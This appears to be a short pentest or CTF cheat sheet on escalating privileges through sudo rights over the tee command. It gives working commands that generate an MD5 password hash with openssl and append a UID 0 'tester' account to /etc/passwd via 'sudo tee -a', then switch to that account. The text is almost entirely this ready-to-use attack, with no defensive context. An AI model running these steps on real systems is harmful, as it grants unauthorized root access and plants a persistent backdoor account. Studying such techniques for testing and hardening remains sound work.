Investigation
If we can execute tee command as root, we can escalate to privilege.
Exploitation
1. Create a New Password for New User
Assume the new username is "tester".
# -1: MD5 algorithm
# -salt: Use privided salt -> The new username here
openssl passwd -1 -salt "tester" "password123"
# Output: $1$tester$LvsygQ2GEt7VUJQEqhMLf/
Copy the output password.
2. Write New Line with Tee
Paste the password in printf and overwrite /etc/passwd using tee command.
printf 'tester:$1$tester$LvsygQ2GEt7VUJQEqhMLf/:0:0:root:/root:/bin/bash\n' | sudo tee -a /etc/passwd
3. Switch to New User
Now the new user was created.
We can switch to the new user.